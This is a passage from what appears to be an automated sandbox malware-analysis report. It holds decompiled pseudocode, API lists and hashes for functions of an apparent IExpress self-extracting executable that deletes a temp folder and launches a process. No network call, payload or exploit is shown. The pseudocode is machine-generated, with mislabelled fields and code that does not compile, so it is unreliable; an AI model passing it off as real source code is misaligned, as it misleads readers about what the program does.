                                                                                                                                                                                                                                              • Part of subcall function 008D53A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008D5434
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                                                            • API String ID: 1979080616-3374052426
                                                                                                                                                                                                                                            • Opcode ID: cb41190dd1efedaaf747e2676ad7a90592ddb64cf920d370ebc14ebd886341bf
                                                                                                                                                                                                                                            • Instruction ID: 1c8fe3aae00a2ca377a74c223a4610e0b2652d8046b58910d236b5b3b7072638
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cb41190dd1efedaaf747e2676ad7a90592ddb64cf920d370ebc14ebd886341bf
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AD310270B01A19ABCF159B6DAC48A7E77BAFF81350B14032BE402C2780DE74CE018696
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                                            			E008D2390(CHAR* __ecx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v276;
                                                                                                                                                                                                                                            				char _v280;
                                                                                                                                                                                                                                            				char _v284;
                                                                                                                                                                                                                                            				struct _WIN32_FIND_DATAA _v596;
                                                                                                                                                                                                                                            				struct _WIN32_FIND_DATAA _v604;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t21;
                                                                                                                                                                                                                                            				int _t36;
                                                                                                                                                                                                                                            				void* _t46;
                                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                                            				void* _t63;
                                                                                                                                                                                                                                            				CHAR* _t65;
                                                                                                                                                                                                                                            				void* _t66;
                                                                                                                                                                                                                                            				signed int _t67;
                                                                                                                                                                                                                                            				signed int _t69;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                                                                                                                                                                                            				_t21 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				_t22 = _t21 ^ _t69;
                                                                                                                                                                                                                                            				_v8 = _t21 ^ _t69;
                                                                                                                                                                                                                                            				_t65 = __ecx;
                                                                                                                                                                                                                                            				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                                                                                                                                                                                            					L10:
                                                                                                                                                                                                                                            					_pop(_t62);
                                                                                                                                                                                                                                            					_pop(_t66);
                                                                                                                                                                                                                                            					_pop(_t46);
                                                                                                                                                                                                                                            					return E008D6CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					E008D1680( &_v276, 0x104, __ecx);
                                                                                                                                                                                                                                            					_t58 = 0x104;
                                                                                                                                                                                                                                            					E008D16B3( &_v280, 0x104, "*");
                                                                                                                                                                                                                                            					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                                                                                                                                                                                            					_t63 = _t22;
                                                                                                                                                                                                                                            					if(_t63 == 0xffffffff) {
                                                                                                                                                                                                                                            						goto L10;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						goto L3;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                            						L3:
                                                                                                                                                                                                                                            						_t58 = 0x104;
                                                                                                                                                                                                                                            						E008D1680( &_v276, 0x104, _t65);
                                                                                                                                                                                                                                            						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                                                                                                                                                                                            							_t58 = 0x104;
                                                                                                                                                                                                                                            							E008D16B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                                                                                                                                                                                            							SetFileAttributesA( &_v280, 0x80);
                                                                                                                                                                                                                                            							DeleteFileA( &_v280);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                                                                                                                                                                                            								E008D16B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                                                                                                                                                                                            								_t58 = 0x104;
                                                                                                                                                                                                                                            								E008D658A( &_v280, 0x104, 0x8d1140);
                                                                                                                                                                                                                                            								E008D2390( &_v284);
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                                                                                                                                                                                            					} while (_t36 != 0);
                                                                                                                                                                                                                                            					FindClose(_t63); // executed
                                                                                                                                                                                                                                            					_t22 = RemoveDirectoryA(_t65); // executed
                                                                                                                                                                                                                                            					goto L10;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}





















                                                                                                                                                                                                                                            0x008d2398
                                                                                                                                                                                                                                            0x008d239e
                                                                                                                                                                                                                                            0x008d23a3
                                                                                                                                                                                                                                            0x008d23a5
                                                                                                                                                                                                                                            0x008d23ae
                                                                                                                                                                                                                                            0x008d23b3
                                                                                                                                                                                                                                            0x008d24cb
                                                                                                                                                                                                                                            0x008d24d2
                                                                                                                                                                                                                                            0x008d24d3
                                                                                                                                                                                                                                            0x008d24d4
                                                                                                                                                                                                                                            0x008d24df
                                                                                                                                                                                                                                            0x008d23c2
                                                                                                                                                                                                                                            0x008d23d1
                                                                                                                                                                                                                                            0x008d23db
                                                                                                                                                                                                                                            0x008d23e4
                                                                                                                                                                                                                                            0x008d23f6
                                                                                                                                                                                                                                            0x008d23fc
                                                                                                                                                                                                                                            0x008d2401
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d2407
                                                                                                                                                                                                                                            0x008d2407
                                                                                                                                                                                                                                            0x008d2408
                                                                                                                                                                                                                                            0x008d2411
                                                                                                                                                                                                                                            0x008d241f
                                                                                                                                                                                                                                            0x008d247a
                                                                                                                                                                                                                                            0x008d2483
                                                                                                                                                                                                                                            0x008d2495
                                                                                                                                                                                                                                            0x008d24a3
                                                                                                                                                                                                                                            0x008d2421
                                                                                                                                                                                                                                            0x008d242f
                                                                                                                                                                                                                                            0x008d2453
                                                                                                                                                                                                                                            0x008d245d
                                                                                                                                                                                                                                            0x008d2466
                                                                                                                                                                                                                                            0x008d2472
                                                                                                                                                                                                                                            0x008d2472
                                                                                                                                                                                                                                            0x008d242f
                                                                                                                                                                                                                                            0x008d24af
                                                                                                                                                                                                                                            0x008d24b5
                                                                                                                                                                                                                                            0x008d24be
                                                                                                                                                                                                                                            0x008d24c5
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d24c5

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindFirstFileA.KERNELBASE(?,008D8A3A,008D11F4,008D8A3A,00000000,?,?), ref: 008D23F6
                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(?,008D11F8), ref: 008D2427
                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(?,008D11FC), ref: 008D243B
                                                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 008D2495
                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 008D24A3
                                                                                                                                                                                                                                            • FindNextFileA.KERNELBASE(00000000,00000010), ref: 008D24AF
                                                                                                                                                                                                                                            • FindClose.KERNELBASE(00000000), ref: 008D24BE
                                                                                                                                                                                                                                            • RemoveDirectoryA.KERNELBASE(008D8A3A), ref: 008D24C5
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 836429354-0
                                                                                                                                                                                                                                            • Opcode ID: 69080489bb3817f120570f1eb75d748b236fc4018833b53bb66b360e7aa1f813
                                                                                                                                                                                                                                            • Instruction ID: 4ecf25488cee95a61948d98f5ce14e0a5cb4ccd65f469110747daa7fcfead0a5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 69080489bb3817f120570f1eb75d748b236fc4018833b53bb66b360e7aa1f813
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E31A232204640ABCB20EBA4DC8DAEB73A8FF94315F144B2FA955C2390EB3499088756
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 675 8d3fef-8d4010 676 8d410a-8d411a call 8d6ce0 675->676 677 8d4016-8d403b CreateProcessA 675->677 678 8d40c4-8d4101 call 8d6285 GetLastError FormatMessageA call 8d44b9 677->678 679 8d4041-8d406e WaitForSingleObject GetExitCodeProcess 677->679 691 8d4106 678->691 681 8d4091 call 8d411b 679->681 682 8d4070-8d4077 679->682 690 8d4096-8d40b8 CloseHandle * 2 681->690 682->681 686 8d4079-8d407b 682->686 686->681 689 8d407d-8d4089 686->689 689->681 692 8d408b 689->692 693 8d4108 690->693 694 8d40ba-8d40c0 690->694 691->693 692->681 693->676 694->693 695 8d40c2 694->695 695->691
                                                                                                                                                                                                                                            C-Code - Quality: 84%
                                                                                                                                                                                                                                            			E008D3FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v524;
                                                                                                                                                                                                                                            				long _v528;
                                                                                                                                                                                                                                            				struct _PROCESS_INFORMATION _v544;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t20;
                                                                                                                                                                                                                                            				void* _t22;
                                                                                                                                                                                                                                            				int _t25;
                                                                                                                                                                                                                                            				intOrPtr* _t39;
                                                                                                                                                                                                                                            				signed int _t44;
                                                                                                                                                                                                                                            				void* _t49;
                                                                                                                                                                                                                                            				signed int _t50;
                                                                                                                                                                                                                                            				intOrPtr _t53;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t45 = __edx;
                                                                                                                                                                                                                                            				_t20 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				_v8 = _t20 ^ _t50;
                                                                                                                                                                                                                                            				_t39 = __ecx;
                                                                                                                                                                                                                                            				_t49 = 1;
                                                                                                                                                                                                                                            				_t22 = 0;
                                                                                                                                                                                                                                            				if(__ecx == 0) {
                                                                                                                                                                                                                                            					L13:
                                                                                                                                                                                                                                            					return E008D6CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                            				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                                                                                                                                                                                            				if(_t25 == 0) {
                                                                                                                                                                                                                                            					 *0x8d9124 = E008D6285();
                                                                                                                                                                                                                                            					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
                                                                                                                                                                                                                                            					_t45 = 0x4c4;
                                                                                                                                                                                                                                            					E008D44B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
                                                                                                                                                                                                                                            					L11:
                                                                                                                                                                                                                                            					_t49 = 0;
                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                            					_t22 = _t49;
                                                                                                                                                                                                                                            					goto L13;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                                                                                                                                                                                            				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                                                                                                                                                                                            				_t44 = _v528;
                                                                                                                                                                                                                                            				_t53 =  *0x8d8a28; // 0x0
                                                                                                                                                                                                                                            				if(_t53 == 0) {
                                                                                                                                                                                                                                            					_t34 =  *0x8d9a2c; // 0x0
                                                                                                                                                                                                                                            					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                                                                                                                                                                                            						_t34 = _t44 & 0xff000000;
                                                                                                                                                                                                                                            						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                                                                                                                                                                                            							 *0x8d9a2c = _t44;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				E008D411B(_t34, _t44);
                                                                                                                                                                                                                                            				CloseHandle(_v544.hThread);
                                                                                                                                                                                                                                            				CloseHandle(_v544);
                                                                                                                                                                                                                                            				if(( *0x8d9a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                                                                                                                                                                                            					goto L12;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                                            0x008d3fef
                                                                                                                                                                                                                                            0x008d3ffa
                                                                                                                                                                                                                                            0x008d4001
                                                                                                                                                                                                                                            0x008d4008
                                                                                                                                                                                                                                            0x008d400a
                                                                                                                                                                                                                                            0x008d400b
                                                                                                                                                                                                                                            0x008d4010
                                                                                                                                                                                                                                            0x008d410a
                                                                                                                                                                                                                                            0x008d411a
                                                                                                                                                                                                                                            0x008d411a
                                                                                                                                                                                                                                            0x008d401c
                                                                                                                                                                                                                                            0x008d401d
                                                                                                                                                                                                                                            0x008d401e
                                                                                                                                                                                                                                            0x008d401f
                                                                                                                                                                                                                                            0x008d4033
                                                                                                                                                                                                                                            0x008d403b
                                                                                                                                                                                                                                            0x008d40ca
                                                                                                                                                                                                                                            0x008d40e9
                                                                                                                                                                                                                                            0x008d40f8
                                                                                                                                                                                                                                            0x008d4101
                                                                                                                                                                                                                                            0x008d4106
                                                                                                                                                                                                                                            0x008d4106
                                                                                                                                                                                                                                            0x008d4108
                                                                                                                                                                                                                                            0x008d4108
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d4108
                                                                                                                                                                                                                                            0x008d4049
                                                                                                                                                                                                                                            0x008d405c
                                                                                                                                                                                                                                            0x008d4062
                                                                                                                                                                                                                                            0x008d4068
                                                                                                                                                                                                                                            0x008d406e
                                                                                                                                                                                                                                            0x008d4070
                                                                                                                                                                                                                                            0x008d4077
                                                                                                                                                                                                                                            0x008d407f
                                                                                                                                                                                                                                            0x008d4089
                                                                                                                                                                                                                                            0x008d408b
                                                                                                                                                                                                                                            0x008d408b
                                                                                                                                                                                                                                            0x008d4089
                                                                                                                                                                                                                                            0x008d4077
                                                                                                                                                                                                                                            0x008d4091
                                                                                                                                                                                                                                            0x008d409c
                                                                                                                                                                                                                                            0x008d40a8
                                                                                                                                                                                                                                            0x008d40b8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d40c2
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d40c2

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateProcessA.KERNELBASE ref: 008D4033
                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 008D4049
                                                                                                                                                                                                                                            • GetExitCodeProcess.KERNELBASE ref: 008D405C
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 008D409C
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 008D40A8
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 008D40DC
                                                                                                                                                                                                                                            • FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 008D40E9
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3183975587-0
                                                                                                                                                                                                                                            • Opcode ID: 0e32682b78a617776eb2aae1c20bd627042fc65d83a458c57b8df6152fa9dddc
                                                                                                                                                                                                                                            • Instruction ID: c3612e603cbb703d339d6901c85cc9a2d4652defe0fb188947a448b9cd6e1cc9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0e32682b78a617776eb2aae1c20bd627042fc65d83a458c57b8df6152fa9dddc
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F131B131642618ABEF209F65DC49FAB777CFB94710F2013ABF645E22A1CA304D85CB21
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 70%
                                                                                                                                                                                                                                            			E008D2BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                                            				long _t4;
                                                                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                                                                            				intOrPtr _t7;
                                                                                                                                                                                                                                            				void* _t9;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t12;
                                                                                                                                                                                                                                            				intOrPtr* _t17;
                                                                                                                                                                                                                                            				signed char _t19;
                                                                                                                                                                                                                                            				intOrPtr* _t21;
                                                                                                                                                                                                                                            				void* _t22;
                                                                                                                                                                                                                                            				void* _t24;
                                                                                                                                                                                                                                            				intOrPtr _t32;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t4 = GetVersion();
                                                                                                                                                                                                                                            				if(_t4 >= 0 && _t4 >= 6) {
                                                                                                                                                                                                                                            					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                                                                                                                                                                                            					if(_t12 != 0) {
                                                                                                                                                                                                                                            						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                                                                                                                                                                                            						if(_t21 != 0) {
                                                                                                                                                                                                                                            							_t17 = _t21;
                                                                                                                                                                                                                                            							 *0x8da288(0, 1, 0, 0);
                                                                                                                                                                                                                                            							 *_t21();
                                                                                                                                                                                                                                            							_t29 = _t24 - _t24;
                                                                                                                                                                                                                                            							if(_t24 != _t24) {
                                                                                                                                                                                                                                            								_t17 = 4;
                                                                                                                                                                                                                                            								asm("int 0x29");
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t20 = _a12;
                                                                                                                                                                                                                                            				_t18 = _a4;
                                                                                                                                                                                                                                            				 *0x8d9124 = 0;
                                                                                                                                                                                                                                            				if(E008D2CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                                                                                                                                                                                            					_t9 = E008D2F1D(_t18, _t20); // executed
                                                                                                                                                                                                                                            					_t22 = _t9; // executed
                                                                                                                                                                                                                                            					E008D52B6(0, _t18, _t21, _t22); // executed
                                                                                                                                                                                                                                            					if(_t22 != 0) {
                                                                                                                                                                                                                                            						_t32 =  *0x8d8a3a; // 0x0
                                                                                                                                                                                                                                            						if(_t32 == 0) {
                                                                                                                                                                                                                                            							_t19 =  *0x8d9a2c; // 0x0
                                                                                                                                                                                                                                            							if((_t19 & 0x00000001) != 0) {
                                                                                                                                                                                                                                            								E008D1F90(_t19, _t21, _t22);
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t6 =  *0x8d8588; // 0x0
                                                                                                                                                                                                                                            				if(_t6 != 0) {
                                                                                                                                                                                                                                            					CloseHandle(_t6);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t7 =  *0x8d9124; // 0x80070002
                                                                                                                                                                                                                                            				return _t7;
                                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                                            0x008d2c03
                                                                                                                                                                                                                                            0x008d2c0d
                                                                                                                                                                                                                                            0x008d2c18
                                                                                                                                                                                                                                            0x008d2c20
                                                                                                                                                                                                                                            0x008d2c2e
                                                                                                                                                                                                                                            0x008d2c32
                                                                                                                                                                                                                                            0x008d2c36
                                                                                                                                                                                                                                            0x008d2c3d
                                                                                                                                                                                                                                            0x008d2c43
                                                                                                                                                                                                                                            0x008d2c45
                                                                                                                                                                                                                                            0x008d2c47
                                                                                                                                                                                                                                            0x008d2c49
                                                                                                                                                                                                                                            0x008d2c4e
                                                                                                                                                                                                                                            0x008d2c4e
                                                                                                                                                                                                                                            0x008d2c47
                                                                                                                                                                                                                                            0x008d2c32
                                                                                                                                                                                                                                            0x008d2c20
                                                                                                                                                                                                                                            0x008d2c50
                                                                                                                                                                                                                                            0x008d2c54
                                                                                                                                                                                                                                            0x008d2c57
                                                                                                                                                                                                                                            0x008d2c64
                                                                                                                                                                                                                                            0x008d2c66
                                                                                                                                                                                                                                            0x008d2c6b
                                                                                                                                                                                                                                            0x008d2c6d
                                                                                                                                                                                                                                            0x008d2c74
                                                                                                                                                                                                                                            0x008d2c76
                                                                                                                                                                                                                                            0x008d2c7c
                                                                                                                                                                                                                                            0x008d2c7e
                                                                                                                                                                                                                                            0x008d2c87
                                                                                                                                                                                                                                            0x008d2c89
                                                                                                                                                                                                                                            0x008d2c89
                                                                                                                                                                                                                                            0x008d2c87
                                                                                                                                                                                                                                            0x008d2c7c
                                                                                                                                                                                                                                            0x008d2c74
                                                                                                                                                                                                                                            0x008d2c8e
                                                                                                                                                                                                                                            0x008d2c95
                                                                                                                                                                                                                                            0x008d2c98
                                                                                                                                                                                                                                            0x008d2c98
                                                                                                                                                                                                                                            0x008d2c9e
                                                                                                                                                                                                                                            0x008d2ca7

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetVersion.KERNEL32(?,00000002,00000000,?,008D6BB0,008D0000,00000000,00000002,0000000A), ref: 008D2C03
                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(Kernel32.dll,?,008D6BB0,008D0000,00000000,00000002,0000000A), ref: 008D2C18
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 008D2C28
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,008D6BB0,008D0000,00000000,00000002,0000000A), ref: 008D2C98
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                                                            • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                                                            • API String ID: 62482547-3460614246
                                                                                                                                                                                                                                            • Opcode ID: 75f6cdde8f738643db5e1c6bfd841fc0e2971e13e8f77e464447a2c2880cffb2
                                                                                                                                                                                                                                            • Instruction ID: b1f4f3eeda8b24b653425931ebbc07bd305512085d6b44783447d6cdca9505ee
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 75f6cdde8f738643db5e1c6bfd841fc0e2971e13e8f77e464447a2c2880cffb2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D0110831221315ABDB247BB9AC89A6F3769FBA43A0B140317F951D3355DE35DC01C662
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E008D6F40() {
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				SetUnhandledExceptionFilter(E008D6EF0); // executed
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}



                                                                                                                                                                                                                                            0x008d6f45
                                                                                                                                                                                                                                            0x008d6f4d

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 008D6F45
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                                                                                                                            • Opcode ID: c83d5209a2386070fa05629ffc4cad0c34b214cdd0b701e68fa9e013c2d68e97
                                                                                                                                                                                                                                            • Instruction ID: db1b78134b21aa513b07f2ba21b4dc9c53b5731ff294e60ad31930999c80494a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c83d5209a2386070fa05629ffc4cad0c34b214cdd0b701e68fa9e013c2d68e97
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1D900264252144979A141B70DD194157791BA4D602BA15662E022C4694EF6440505512
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

